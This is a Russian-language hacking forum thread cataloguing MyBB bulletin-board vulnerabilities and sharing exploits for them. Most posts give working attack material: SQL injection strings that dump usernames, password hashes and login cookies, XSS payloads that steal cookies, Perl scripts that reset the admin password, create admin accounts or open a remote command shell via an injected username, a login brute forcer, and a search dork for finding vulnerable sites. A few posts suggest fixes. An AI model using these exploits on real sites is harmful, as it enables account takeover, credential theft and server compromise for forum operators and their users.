Баги в MyBulletinBoard

[Winux]

SQL инъекция в MyBulletinBoard
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения. Уязвимость существует в сценарии /admin/index.php из-за недостаточной обработки входных данных в поле Username при выключенной опции magic_quotes_gpc.
Удаленный пользователь может выполнить произвольные SQL команды в базе данных и получить административные привилегии в приложении.

Например:

Username: ' or 1=1 /*
Password: blank
member.php?action=login : username='[SQL INJECTION]
polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]
search.php?action='[SQL Injection]
member.php?action='[SQL Injection]

:zns2: Подробно

 

[Winux]

А вот и сплойт к этой уязвимости:

#!/usr/bin/perl 
###################################################################################### 
# Crouz.Com Security Team # 
###################################################################################### 
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability # 
# # 
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) # 
#Email: Alpha_Programmer@LinuxMail.ORG # 
# # 
#This Xpl Change Admin's Pass For L0gin With P0wer User # 
# # 
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln # 
# # 
###################################################################################### 
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno # 
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) # 
# # 
# Special Lamerz : Hoormazd & imm02tal :P ++ xshabgardx # 
###################################################################################### 

use IO::Socket; 

if (@ARGV < 2) 
{ 
print "\n==========================================\n"; 
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n"; 
print " Crouz Security Team \n\n"; 
print " Usage: <T4rg3t> <DIR>\n\n"; 
print "==========================================\n\n"; 
print "Examples:\n\n"; 
print " Mybb.pl www.Site.com /mybb/ \n"; 
exit(); 

} 
my $host = $ARGV[0]; 
my $dir = $ARGV[1]; 
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "80" ); 
unless ($remote) { die "C4nn0t C0nn3ct to $host" } 
print "C0nn3cted\n"; 
$http = "GET $dir/search.php?action=finduser&uid=-1'; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n"; 
$http .= "Host: $host\n\n\n\n"; 
print "\n"; 
print $remote $http; 
print "Wait For Changing Password ...\n"; 
sleep(10); 
print "OK , Now Login With :\n"; 
print "Username: crouz\n"; 
print "Password: crouz\n\n"; 
print "Enjoy;)\n\n";

 

[Ŧ1LAN]

Множественные уязвимости в MyBB
Программа: MyBB 1.01 и более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в поле "message". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта, если сообщение просматривается с помощью сценария "printthread.php".

2. Уязвимость существует при обработке расширений загружаемых файлов. Удаленный пользователь может с помощью специально сформированного имени файла выполнить произвольные SQL команды в базе данных приложения. Удачная эксплуатация уязвимости возможна при выключенной опции "magic_quotes_gpc".
Решение: Способов устранения уязвимости не существует в настоящее время.
:zns2: Производитель
Источник: www.securitylab.ru

 

[Winux]

Еще 1 бажка в этом двиге
Межсайтовый скриптинг в MyBB
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в подписи пользователей. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Удачная эксплуатация уязвимости возможна при включенной опции "Allow HTML in Signatures". Пример

<img
src=&#106&#97&#118&#97&#115&
#99&#114&#105&#112&#116&#58[code (HTML
entities encoded)]>

Способов устранения уязвимости не существует в настоящее время. В качестве временного решения рекомендуется запретить использование HTML кода в подписях.

 

[Ŧ1LAN]

Раскрытие префикса таблиц в MyBB
Программа: MyBB 1.0.2, возможно более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным.

Уязвимость существует из-за того, что сообщение об ошибке в SQL запросе выводится в браузер пользователя. Удаленный пользователь может с помощью специально сформированного запроса получить данные об используемом префиксе таблиц в базе данных.
Пример:

http://[victim]/search.php?s=de1aaf9b&action=
do_search&keywords=a&srchtype=3

Решение: Способов устранения уязвимости не существует в настоящее время

 

[Winux]

Межсайтовый скриптинг в MyBB
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

1. Уязвимость существует из-за отсутствия проверки некоторых HTTP POST запросов в параметрах "notepad" и "signature". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/usercp.php?action=notepad
notepad=</textarea><script>alert(document.cookie)</script>

http://[target]/usercp.php?action=editsig
signature=</textarea><script>alert(document.cookie)</script>

2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "sortby" и "sortordr" в сценарии "search.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://victim/mybb/search.php?action=do_search&keywords=&
postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1
&numreplies=&postdate=0&pddir=1&sortby="><script language=javascript>
alert(document.cookie)</script>&sorder=1&showresults=threads&submit=Search

 

[Ŧ1LAN]

SQL-инъекция в MyBB
Программа: MyBB 1.02 и более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "templatelist". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Решение: Установите последнюю версию (1.03) с сайта производителя.
:zns2: производитель

 

[Ŧ1LAN]

Межсайтовый скриптинг и SQL-инъекция в MyBB
Программа: MyBB 1.0.3 и более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападении и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "gid" сценария managegroup.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Удачная эксплуатация уязвимости возможна при наличии group leader привилегий.

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "gid" в сценарии "managegroup.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплойт:
mybb.pl

#!/bin/env perl
#//-------------------------------------------------------------#
#//     MyBB Forum SQL Injection Exploit .. By HACKERS PAL      #
#//     Greets For Devil-00 - Abducter - Almaster - GaCkeR      #
#//   Special Greets For SG (SecurityGurus) Team And Members    #
#//                    http://WwW.SoQoR.NeT                     #
#//-------------------------------------------------------------#

use LWP::Simple;
print "\n#####################################################";
print "\n#        MyBB Forum Exploit By : HACKERS PAL        #";
print "\n#               Http://WwW.SoQoR.NeT                #";
if(!$ARGV[0] or !$ARGV[1]) {
    print "\n# -- Usage:                                         #";
    print "\n# -- perl $0 [Full-Path] [User ID]             #";
    print "\n# -- Example:                                       #";
    print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
    exit(0);
}
else
{
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
    $web=$ARGV[0];
    $id=$ARGV[1];
    $url = "showteam.php?GLOBALS[]=1&comma=/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/FROM (.*)users u WHERE/;
    $prefix=$1;
    if(!$1)
    {
        $prefix="mybb_";
    }
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    print "\n[+] Table Prefix is : $prefix";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
    print "\n[-] Unable to retrieve User Name\n" if(!$1);
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
    die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
    print"\n[!] Watch out ... The Cookie Value is comming\n";
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
    print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# WwW.SoQoR.NeT

 

[t0xIc]

2 2507
Эксплойт:mybb.pl
выдаёт вот такое
#####################################################
# MyBB Forum Exploit By : HACKERS PAL #
# Http://WwW.SoQoR.NeT #
# Greets To Devil-00 - Abducter - GaCkeR #
#####################################################
[ + ] Connected to: http://*****.com/mybb/
[ + ] User ID is : 1
[ + ] Table Prefix is : mybb_
[ + ] User Name : Ryu
[ + ] Md5 Hash of Password : Ryu

[!] Watch out ... The Cookie Value is comming
[ + ] Cookie [mybbuser] Value:-
[*] 1_Ryu

C:\>

Где ошибка в коде??? :bang:

 

[Ŧ1LAN]

Межсайтовый скриптинг в MyBB
Программа: MyBB 1.04, возможно более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в "advanced details". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

http://[host]/mybb/calendar.php?">[code]

 

[Winux]

MyBB 1.10 CrossSiteScripting
Простенький XSS, думаю ежу понятно.

[email=a" onmousemove="alert(document.cookie);" aaa (at) aaa (dot) aaa [email concealed]]Click Here![/email]

 

[Robin Gud]

MyBB <=1.10 XSS
Недавно была найдена очередная уязвимость в форумном движке MyBB <=1.10, кроме недавнего эксплойта. Уязвимость класса XSS.

[_email=a" onmousemove="alert(document._cookie);" mail@_mail.ru]Заходи сюда[_/email]

Возможна модификация:

onmousemove="alert(document._cookie);"

При использовании "_" необходимо убрать.

 

[RedDevil]

Недавно обнаруженная уязвимость в MyBB 1.1.1.

[ This Local Injections Only For Admin ]

* 1 *

adminfunctions.php , line 730

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['action']."','".$querystring."','".$ipaddress."')");

$querystring = Not Filtered

Exploit Exm.
    /admin/adminlogs.php?action=view&D3vil-0x1=[SQL]'

Fix , Replace with

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['action']."','".addslashes($querystring)."','".$ipaddress."')");

* 2 *

templates.php , lines 107 to 114

$newtemplate = array(
"title" => addslashes($mybb->input['title']),
"template" => addslashes($mybb->input['template']),
"sid" => $mybb->input['setid'],
"version" => $mybboard['vercode'],
"status" => "",
"dateline" => time()
);

sid = Not Filtered

Exploit Exm.
    /admin/templates.php?action=do_add&title=Devil&template=Div&setid=[SQL]'

Fix Replace with

$newtemplate = array(
"title" => addslashes($mybb->input['title']),
"template" => addslashes($mybb->input['template']),
"sid" => addslashes($mybb->input['setid']),
"version" => $mybboard['vercode'],
"status" => "",
"dateline" => time()
);

* 3 *

templates.php , line 600

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".$expand."'");

$expand = $mybb->input['expand']; = Not Filtered

Exploit Exm.
    /admin/templates.php?expand=' UNION ALL SELECT 1,2/*

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".intval($expand)."'");

* 4 *

templates.php , line 424

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid1']."'");
$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid2']."'");

Exploit Exm.
    /admin/templates.php?action=diff&title=[SQL]'
        /admin/templates.php?action=diff&sid2=[SQL]'

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes($mybb->input['title'])."' AND sid='".intval($mybb->input['sid1'])."'");
$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes(($mybb->input['title'])."' AND sid='".intval($mybb->input['sid2'])."'");

MyBB Has Many Local Bugs ,, Fix It s00n

 

[Ŧ1LAN]

MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit
Пример/эксплоит:

#!/usr/bin/perl 
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
#	./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file 
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok, 
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output 
#   for debugging.
# - After you have created the exploit or if you have a valid non common 
#   user, you can execute shell commands.
#
# TIPS:
#  * Sometimes you have to change the thread Id, --tid is your friend;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Mejor karate aun dentro ti.
#
# LIMITATIONS:
#	* If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'       => \$host, 
  'dir=s'       => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug,
  '1'        => \$first_time,
  'tid=s'       => \$tid,
  'delete'       => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
	$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
  login() if !$logged;

  print "mybibi> "; # lost connection
  while(<STDIN>) {
    $command=$_;
    chomp($command);
    last;
  }
  &send($command);
}

sub send  {
	chomp (my $cmd = shift);
	my $h = $host.$dir."/newthread.php";
	my $req = POST $h, [
  'subject' => '514',
  'message' => '/slap 514',
  'previewpost' => 'Preview Post',
  'action' => 'do_newthread',
  'fid' => $tid,
  'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
	];
	$req->header($uservar => $cmd);
	print $req->as_string() if $debug;
	my $res = $ua->request($req);
	if ($res->content =~ /You may not post in this/) {
  print "[!] don't have perms to post. Change the Forum ID\n";
	} else {
  my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
  print $data;
	}

}
sub login {
	my $h  = $host.$dir."/member.php";
	my $req = POST $h,[
  'username' => $username,
  'password' => $password,
  'submit' => 'Login',
  'action' => 'do_login'
	];
	my $res = $ua->request($req);
	if ($res->content =~ /You have successfully been logged/is) {
  print "[*] Login succesful!\n";
  $logged = 1;
	} else {
  print "[!] Error login-in\n";
	}
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
	# firs we need to get the img.
	my  $h = $host.$dir."/member.php";
	print "Host: $h\n";

	$req = HTTP::Request->new (GET => $h."?action=register");
	$res = $ua->request ($req);

	my $req = POST $h, [
  'action' => "register",
  'agree' => "I Agree"
	];
	print $req->as_string() if $debug;
	$res = $ua->request($req);

	my $content = $res->content();
	$content =~ m/.*(image\.php\?action.*?)\".*/is;
	my $img = $1;
	my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
	$res = $ua->request ($req);
	print $req->as_string();

	if ($res->content) {
  open (TMP, ">/tmp/file.png") or die($!);
  print TMP $res->content;
  close (TMP);
  print "[*] /tmp/file.png created.\n";
	}

	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink ("/tmp/file.png");
	$img_str =~ s/\n//g;
	my $req = POST $h, [
  'username' => $username,
  'password' => $password,
  'password2' => $password,
  'email' => $email,
  'email2' => $email,
  'imagestring' => $img_str,
  'imagehash' => $hash,
  'allownotices' => 'yes',
  'receivepms' => 'yes',
  'pmpopup' => 'no',
  'action' => "do_register",
  'regsubmit' => "Submit Registration"
	];
	$res = $ua->request($req);
	print $req->as_string() if $debug;

	open (OUT, ">mybibi_out.html");
	print OUT $res->content;

	print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
{
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = <STDIN>;
	return $str;
}
exit 0;

 

[not null]

MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit

#!/usr/bin/perl
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;
 
 print q(
 ###########################################################
 # MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n"; 
  exit();
 }
 
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";


   
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'member.php',
 Content => [
 "action"   => "do_login",
 "username"   => "$uname",
 "password"   => "$passwd",
 "submit"      => "Login",
 ],);
 
 if($cookie_jar->as_string =~ /mybbuser=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  exit(); 
  }
 
$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

 

[not null]

MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit
Позволяет добавлять пользователя с правами администратора. Ошибка похожа на ошибку в IPB < 2.1.7 (тоже подделка заголовка CLIENT-IP).
Скачать|Download

 

[baltazar]

MyBB 1.2.x default hash: md5(md5($salt).md5($pass))
. . mybb_users
. . . . uid
. . . . username
. . . . password
. . . . salt
. . . . email
. . . . loginkey
. . . . icq
. . . . aim
. . . . regip
. . mybb_forums
. . . . fid
. . . . pid
. . . . name
. . . . password
. . . . cansendemail


MyBB Brute Forcer

#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(
###########################################################
#                   MyBB brute forcer                     #
#           http://unnamedone.freehostia.com              #
#               brian_denys@hotmail.com                   #
#                  09 - April - 2008                      #
################## Coded By UnnamedOne ####################
);

if (@ARGV < 4)
{
   print " #  I am not responsible for anything that you do with this!\n";
   print " #  usage : mybb.pl [host & path] [user] [pass] [target]\n";
   print " #  E.g : mybb.pl www.milw0rm.com/MyBB/ UnnamedOne MyPass str0ke\n";
   exit();
}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
   crack($t);
}

sub fakelogin
{
   $xplr = LWP::UserAgent->new() or die;
   $cookie_jarr = HTTP::Cookies->new();
   $xplr->cookie_jar( $cookie_jarr );

   $resr = $xplr->post($url.'member.php',
   Content => [
   "action"   => "do_login",
   "username"   => "$usern",
   "password"   => "$passw",
   "submit"      => "Login",
   ],);

   if($cookie_jarr->as_string =~ /mybbuser=(.*?);/)
   {
      # Do nothing..
   }
   else
   {
      print $cookie_jarr->as_string;
      print "Forum not vulnerable or wrong username / password.\n";
      exit();
   }
}

sub crack
{
   $xpl = LWP::UserAgent->new() or die;
   $cookie_jar = HTTP::Cookies->new();
   $CharSet = shift;
   @RawString = ();
   for (my $i =0;$i<$CharSet;$i++) {
      $RawString[i] = 0;
   }
   $Start = gettimeofday();
   do
   {
      for (my $i =0;$i<$CharSet;$i++) {
         if ($RawString[$i] > length($alpha)-1)
         {
            if ($i==$CharSet-1) {
               $cnt = 0;
               return false;
            }
            $RawString[$i+1]++;
            $RawString[$i]=0;
         }
      }
      $ret = "";
      for (my $i =0;$i<$CharSet;$i++) {
         $ret = $ret . substr($alpha,$RawString[$i],1);
      }
      $count++;
      if($count == 4) {
         fakelogin();
         $count = 0;
      }
      $xpl->cookie_jar( $cookie_jar );
      $res = $xpl->post($url.'member.php',
      Content => [
      "action"   => "do_login",
      "username"   => "$uname",
      "password"   => "$ret",
      "submit"      => "Login",
      ],);
      $cnt++;
      $Stop = gettimeofday();
      if ($Stop-$Start>$dbgtmr) {
         $cnt = int($cnt/$dbgtmr);
         $Start = gettimeofday();
      }
      $logins++;
      system("clear");
      $pro = ($logins / ($charcount * $maxchars));
      print "Current password: $ret\n";
      print "Login attempts: $logins\n";
      print "Cracking speed: $cnt passwords/sec\n";
      print "$pro% finished.\n";
      $cnt = 0;
      if($cookie_jar->as_string =~ /mybbuser=(.*?);/)
      {
         print "Password cracked! => $ret\n";
         exit();
      }
      $RawString[0]++;
   }while($RawString[$CharSet-1]<length($alpha));
}

MyBB Plugin Custom Pages 1.0 Remote SQL Injection Vulnerabil

###################################################################################
#                                #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
#                                #
#    found by: Lidloses_Auge                        #
#    Contact (ICQ):  120946783                       #
#    Greetz to: free-hack.com                       #
#                                #
###############################################################################################################################################
#                                                         #
# Vulnerability:                                                   #
#                                                         #
#    Document:      pages.php                                                #
#    GET-Parameter: page                                                #
#                                                         #
# Dork:                                                         #
#                                                         #
#    inurl:"pages.php" + intext:"powered by mybb"                                       #
#                                                         #
# Example:                                                      #
#                                                         #
#    http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
#                                                         #
# Notes:                                                      #
#                                                         #
#    Successrate depends on the permissions which could be set for viewing the 'page'                                #
#                                                         #
###############################################################################################################################################